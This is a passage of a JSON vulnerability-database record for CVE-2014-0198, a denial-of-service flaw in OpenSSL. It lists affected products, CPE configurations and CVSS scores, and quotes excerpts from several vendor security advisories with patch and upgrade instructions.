"vendor": "juniper", "version": null }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9900" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59000" }, { "model": "updatexpress system packs installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "oceanstor s5800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "usg2000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart update manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.4.1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "mcp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "66000" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.92743" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "75000" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69000" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8300" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "junos 12.2r8-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "oceanstor s5600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.7" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "jabber video for ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secblade fw family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "tssc", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "junos 12.1x44-d26", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.2" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.2" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "webex connect client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "junos 10.4r15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "uacos c4.4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "elog v100r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos pulse 4.0r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security module for cisco network registar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6" }, { "model": "junos 14.1r2", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "p2 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1810v10" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "junos 10.0s25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "softco v200r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.2" }, { "model": "s6900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "svn5500 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.2" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.1" }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "msr50 g2 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "junos 10.4r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "agent desktop for cisco unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.3r4-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "dsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "agile controller v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.1" }, { "model": "nip2000\u00265000 v100r002c10hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "66020" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.4" }, { "model": "junos r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1" }, { "model": "oceanstor s5800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "css series content services switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "115000" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.10" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smc2.0 v100r002c01b017sp16", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.10" }, { "model": "espace iad v300r001c07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "security network intrusion prevention system gx7412-05", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.0" }, { "model": "dynamic system analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "s7700\u0026s9700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "blackberry link", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "1.2" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.05" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "msr20-1x family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "real-time compression appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.9.107" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "msr30-1x family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos 12.1x44-d32", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "4510g switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "physical access gateways", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "dsr-1000 rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "session border controller enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "s7700\u0026s9700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "dsr-1000n 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "junos 12.1r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ive os 8.0r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89410" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "isoc v200r001c01spc101", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.1" }, { "model": "documentum content server sp2 p16", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "oceanstor s2200t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace usm v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos os 12.1x44-d40", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.1" } ], "sources": [ { "db": "BID", "id": "67193" }, { "db": "CNNVD", "id": "CNNVD-201405-057" }, { "db": "NVD", "id": "CVE-2014-0198" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.1g", "versionStartIncluding": "1.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:mariadb:mariadb:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "10.0.13", "versionStartIncluding": "10.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_desktop:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0198" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127326" }, { "db": "PACKETSTORM", "id": "129218" }, { "db": "PACKETSTORM", "id": "127265" } ], "trust": 0.6 }, "cve": "CVE-2014-0198", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2014-0198", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-0198", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201405-057", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-0198", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0198" }, { "db": "CNNVD", "id": "CNNVD-201405-057" }, { "db": "NVD", "id": "CVE-2014-0198" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a buffer pointer during certain recursive calls, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via vectors that trigger an alert condition. OpenSSL is prone to denial-of-service vulnerability. \nAn attacker may exploit this issue to crash the application, resulting in denial-of-service conditions. \n\nThe oldstable distribution (squeeze) is not affected. \n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.0.1e-2+deb7u9. \n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.0.1g-4. \n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.0.1g-4. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198\n http://advisories.mageia.org/MGASA-2014-0204.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 0960978623ce1a63b660860f11a273cd mbs1/x86_64/lib64openssl1.0.0-1.0.0k-1.3.mbs1.x86_64.rpm\n a1f2e8359b1823df2bbf4cef25ed0fa5 mbs1/x86_64/lib64openssl-devel-1.0.0k-1.3.mbs1.x86_64.rpm\n 9caf8ee1e9151cd22cc8bbbcec6ddc64 mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0k-1.3.mbs1.x86_64.rpm\n e7e8655dcdfcf3499b5d3280a7023beb mbs1/x86_64/lib64openssl-static-devel-1.0.0k-1.3.mbs1.x86_64.rpm\n 34ef39c4e07e20ed081ff466b744e6b1 mbs1/x86_64/openssl-1.0.0k-1.3.mbs1.x86_64.rpm \n 4c4315e35972686c692a095851d42cd4 mbs1/SRPMS/openssl-1.0.0k-1.3.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. \n\nHP Insight Control server deployment packages HP System Management Homepage\n(SMH) and HP Version Control Agent (VCA), and HP Smart Update Manager (SUM)\nand deploys them through the following components. This bulletin provides the\ninformation needed to update the HP Insight Control server deployment\nsolution. HP has provided manual update steps\nif a version upgrade is not possible; if users wish to remain at v7.1.2,\nv7.2.0, or v7.2.1. \n\nNote: It is important to check your current running version of HP Insight\nControl server deployment and to follow the correct steps listed below. For\nHP Insight Control server deployment v7.2.2, users must upgrade to v7.3.1 and\nfollow the steps below to remove the vulnerability. That Security Bulletin with instructions on how to upgrade\nto v7.3.1 can be found here:\n\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\na-c04267749\n\nHP Insight Control server deployment users of v7.1.2, v7.2.0, v7.2.1 should\ntake the following steps to remove this vulnerability. \n\nDelete the files smhamd64-*.exe/smhx86-*.exe\" from Component Copy Location\nlisted in the following table, rows 1 and 2. \nDelete the files \"vcax86-*.exe/vcaamd64-*.exe from Component Copy Location\nlisted in the following table, rows 3 and 4. \nDelete the files hpsmh-7.*.rpm\" from Component Copy Location listed in row 5. \nIn sequence, perform the steps from left to right in the following table. \nFirst, download components from Download Link; Second, rename the component\nas suggested in Rename to. Third, copy the component to the location\nspecified in Component Copy Location. \nTable Row Number\n Download Link\n Rename to\n Component Copy Location\n\n1\n http://www.hp.com/swpublishing/MTX-e8076c2a35804685ad65b2b1ba\n smhamd64-ccp023716.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n2\n http://www.hp.com/swpublishing/MTX-3395d737d98f42149125b9bb05\n smhx86-cp023715.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n3\n http://www.hp.com/swpublishing/MTX-8aefeaf490284a7691eca97d13\n vcax86-cp023742.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n4\n http://www.hp.com/swpublishing/MTX-c0d32bac154a4d93839d8cd1f2\n vcaamd64-cp023743.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n5\n http://www.hp.com/swpublishing/MTX-bd9a1cf60e344c549c4888db93\n Do not rename the downloaded component for this step. \n \\\\express\\hpfeatures\\hpagents-sles11-x64\\components\n\\\\express\\hpfeatures\\hpagents-sles10-x64\\components\n\\\\express\\hpfeatures\\hpagents-rhel5-x64\\components\n\\\\express\\hpfeatures\\hpagents-rhel6-x64\\components\n\nDownload and extract the HPSUM 5.3.6 component from\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-windows/p750586112/v99793\n\nCopy all content from extracted ZIP folder and paste into\n\\\\eXpress\\hpfeatures\\fw-proLiant\\components\nInitiate Install HP Management Agents for SLES 11 x64 on targets running\nSLES11 x64. \nInitiate Install HP Management Agents for SLES 10 x64 on targets running\nSLES10 x64. \nInitiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL\n6 x64. \nInitiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL\n5 x64. \nInitiate Install HP Management Agents for Windows x86/x64 on targets running\nWindows. \n\nHP Insight Control server deployment users with v7.2.2:\n\nPlease upgrade to Insight Control server deployment v7.3.1 and follow the\nsteps below for v7.3.1. \n\nHP Insight Control server deployment users with v7.3.1:\n\nPerform steps 1 - 4 as outlined above for users with HP Insight Control\nserver deployment v7.1.2, v7.2.0, and v7.2.1. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201407-05\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: OpenSSL: Multiple vulnerabilities\n Date: July 27, 2014\n Bugs: #512506\n ID: 201407-05\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, possibly allowing\nremote attackers to execute arbitrary code. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.1h-r1\"\n\nReferences\n==========\n\n[ 1 ] CVE-2010-5298\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5298\n[ 2 ] CVE-2014-0195\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0195\n[ 3 ] CVE-2014-0198\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0198\n[ 4 ] CVE-2014-0221\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0221\n[ 5 ] CVE-2014-0224\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0224\n[ 6 ] CVE-2014-3470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3470\n[ 7 ] OpenSSL Security Advisory [05 Jun 2014]\n http://www.openssl.org/news/secadv_20140605.txt\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201407-05.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. These vulnerabilities include: \n\n* The SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"POODLE\", which could be exploited remotely\nresulting in disclosure of information. \n\n - HP StoreVirtual VSA Software 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 600GB SAS Storage 